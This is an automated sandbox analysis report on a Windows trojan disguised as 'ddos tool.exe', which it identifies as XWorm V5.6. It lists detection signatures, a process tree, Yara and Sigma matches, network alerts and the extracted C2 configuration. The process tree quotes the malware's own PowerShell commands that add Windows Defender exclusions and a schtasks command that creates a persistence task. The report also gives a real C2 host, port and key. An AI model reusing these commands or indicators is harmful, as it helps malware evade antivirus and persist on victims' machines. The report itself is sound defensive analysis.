Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ddos tool.exe

Overview

General Information

Sample name:ddos tool.exe
Analysis ID:1583946
MD5:a5644dc7298b5bd632f3656816fff5ed
SHA1:64a165e790724d9c9d5c221db96d72a61cbe8f4d
SHA256:48b2dcdf48cda77f19d3713f86b0dbb7dd0bf71399b77c5745368f9945bdac0e
Tags:Backdoorexejalapenomalwaretrojanuser-Joker
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Connects to many ports of the same IP (likely port scanning)
Contains functionality to capture screen (.Net source)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates autostart registry keys with suspicious values (likely registry only malware)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Electron Application Child Processes
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ddos tool.exe (PID: 3040 cmdline: "C:\Users\user\Desktop\ddos tool.exe" MD5: A5644DC7298B5BD632F3656816FFF5ED)
    • cmd.exe (PID: 3716 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\lil bot.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Teams.exe (PID: 3172 cmdline: "C:\Users\user\AppData\Local\Temp\Teams.exe" MD5: 45AB951734AFA65081F4D0A6F8D2175E)
      • powershell.exe (PID: 5332 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2412 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Teams.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2796 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\SystemUser.dll' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1888 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SystemUser.dll' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 1096 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser" /tr "C:\Users\user\AppData\Local\Temp\SystemUser.dll" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 5636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • SystemUser.dll (PID: 5952 cmdline: C:\Users\user\AppData\Local\Temp\SystemUser.dll MD5: 45AB951734AFA65081F4D0A6F8D2175E)
  • OpenWith.exe (PID: 6020 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • svchost.exe (PID: 6984 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SystemUser.dll (PID: 1716 cmdline: C:\Users\user\AppData\Local\Temp\SystemUser.dll MD5: 45AB951734AFA65081F4D0A6F8D2175E)
  • OpenWith.exe (PID: 5616 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["responsibility-popular.gl.at.ply.gg"], "Port": 57012, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\Teams.exeJoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\AppData\Local\Temp\Teams.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\Users\user\AppData\Local\Temp\Teams.exerat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
      • 0xd235:$str01: $VB$Local_Port
      • 0xd262:$str02: $VB$Local_Host
      • 0xb12e:$str03: get_Jpeg
      • 0xb8f4:$str04: get_ServicePack
      • 0xf16f:$str05: Select * from AntivirusProduct
      • 0xfe4f:$str06: PCRestart
      • 0xfe63:$str07: shutdown.exe /f /r /t 0
      • 0xff15:$str08: StopReport
      • 0xfeeb:$str09: StopDDos
      • 0xffe1:$str10: sendPlugin
      • 0x10161:$str12: -ExecutionPolicy Bypass -File "
      • 0x10d7b:$str13: Content-length: 5235
      C:\Users\user\AppData\Local\Temp\Teams.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xe9ef:$s6: VirtualBox
      • 0xe94d:$s8: Win32_ComputerSystem
      • 0x1219d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x1223a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x1234f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x10c96:$cnc4: POST / HTTP/1.1
      C:\Users\user\AppData\Local\Temp\SystemUser.dllJoeSecurity_XWormYara detected XWormJoe Security
        Click to see the 3 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000004.00000000.1997412009.00000000008D2000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          00000004.00000000.1997412009.00000000008D2000.00000002.00000001.01000000.00000006.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xe7ef:$s6: VirtualBox
          • 0xe74d:$s8: Win32_ComputerSystem
          • 0x11f9d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x1203a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x1214f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x10a96:$cnc4: POST / HTTP/1.1
          00000004.00000002.2933576803.0000000002B81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000004.00000002.2938411155.0000000012B91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000004.00000002.2938411155.0000000012B91000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0xf467:$s6: VirtualBox
              • 0xf3c5:$s8: Win32_ComputerSystem
              • 0x12c15:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x12cb2:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x12dc7:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x1170e:$cnc4: POST / HTTP/1.1
              Click to see the 1 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              4.0.Teams.exe.8d0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                4.0.Teams.exe.8d0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  4.0.Teams.exe.8d0000.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
                  • 0xd235:$str01: $VB$Local_Port
                  • 0xd262:$str02: $VB$Local_Host
                  • 0xb12e:$str03: get_Jpeg
                  • 0xb8f4:$str04: get_ServicePack
                  • 0xf16f:$str05: Select * from AntivirusProduct
                  • 0xfe4f:$str06: PCRestart
                  • 0xfe63:$str07: shutdown.exe /f /r /t 0
                  • 0xff15:$str08: StopReport
                  • 0xfeeb:$str09: StopDDos
                  • 0xffe1:$str10: sendPlugin
                  • 0x10161:$str12: -ExecutionPolicy Bypass -File "
                  • 0x10d7b:$str13: Content-length: 5235
                  4.0.Teams.exe.8d0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                  • 0xe9ef:$s6: VirtualBox
                  • 0xe94d:$s8: Win32_ComputerSystem
                  • 0x1219d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                  • 0x1223a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                  • 0x1234f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                  • 0x10c96:$cnc4: POST / HTTP/1.1

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: New RUN Key Pointing to Suspicious Folder
                  Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\SystemUser.dll, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\Teams.exe, ProcessId: 3172, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemUser
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Teams.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Teams.exe, ParentProcessId: 3172, ParentProcessName: Teams.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe', ProcessId: 5332, ProcessName: powershell.exe
                  Sigma detected: Script Interpreter Execution From Suspicious Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Teams.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Teams.exe, ParentProcessId: 3172, ParentProcessName: Teams.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe', ProcessId: 5332, ProcessName: powershell.exe
                  Sigma detected: Suspicious Script Execution From Temp Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Teams.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Teams.exe, ParentProcessId: 3172, ParentProcessName: Teams.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe', ProcessId: 5332, ProcessName: powershell.exe
                  Sigma detected: Change PowerShell Policies to an Insecure Level
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Teams.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Teams.exe, ParentProcessId: 3172, ParentProcessName: Teams.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe', ProcessId: 5332, ProcessName: powershell.exe
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\SystemUser.dll, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\Teams.exe, ProcessId: 3172, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemUser
                  Sigma detected: Execution of Suspicious File Type Extension
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\SystemUser.dll, CommandLine: C:\Users\user\AppData\Local\Temp\SystemUser.dll, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\SystemUser.dll, NewProcessName: C:\Users\user\AppData\Local\Temp\SystemUser.dll, OriginalFileName: C:\Users\user\AppData\Local\Temp\SystemUser.dll, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\SystemUser.dll, ProcessId: 5952, ProcessName: SystemUser.dll
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Teams.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Teams.exe, ParentProcessId: 3172, ParentProcessName: Teams.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe', ProcessId: 5332, ProcessName: powershell.exe
                  Sigma detected: Startup Folder File Write
                  Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Teams.exe, ProcessId: 3172, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemUser.lnk
                  Sigma detected: Suspicious Add Scheduled Task Parent
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser" /tr "C:\Users\user\AppData\Local\Temp\SystemUser.dll", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser" /tr "C:\Users\user\AppData\Local\Temp\SystemUser.dll", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Teams.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Teams.exe, ParentProcessId: 3172, ParentProcessName: Teams.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser" /tr "C:\Users\user\AppData\Local\Temp\SystemUser.dll", ProcessId: 1096, ProcessName: schtasks.exe
                  Sigma detected: Suspicious Electron Application Child Processes
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Teams.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Teams.exe, ParentProcessId: 3172, ParentProcessName: Teams.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe', ProcessId: 5332, ProcessName: powershell.exe
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser" /tr "C:\Users\user\AppData\Local\Temp\SystemUser.dll", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser" /tr "C:\Users\user\AppData\Local\Temp\SystemUser.dll", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Teams.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Teams.exe, ParentProcessId: 3172, ParentProcessName: Teams.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser" /tr "C:\Users\user\AppData\Local\Temp\SystemUser.dll", ProcessId: 1096, ProcessName: schtasks.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Teams.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Teams.exe, ParentProcessId: 3172, ParentProcessName: Teams.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Teams.exe', ProcessId: 5332, ProcessName: powershell.exe
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6984, ProcessName: svchost.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-03T22:21:06.171264+010028528701Malware Command and Control Activity Detected147.185.221.2457012192.168.2.549941TCP
                  2025-01-03T22:21:13.734255+010028528701Malware Command and Control Activity Detected147.185.221.2457012192.168.2.549941TCP
                  2025-01-03T22:21:17.754451+010028528701Malware Command and Control Activity Detected147.185.221.2457012192.168.2.549941TCP
                  2025-01-03T22:21:27.553341+010028528701Malware Command and Control Activity Detected147.185.221.2457012192.168.2.549941TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-03T22:21:03.382141+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:03.523155+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:03.685455+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:03.872592+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:03.975438+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:04.084511+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:04.193679+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:04.303060+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:04.412583+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:04.524277+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:04.631208+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:04.740468+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:04.850000+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:04.959196+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:05.068790+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:05.178012+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:05.287431+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:05.396730+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:05.506204+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:05.615524+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:05.724951+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:05.834410+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:05.946087+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:06.053075+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
                  2025-01-03T22:21:06.168996+010028529231Malware Command and Control Activity Detected192.168.2.549983147.185.221.2457012TCP
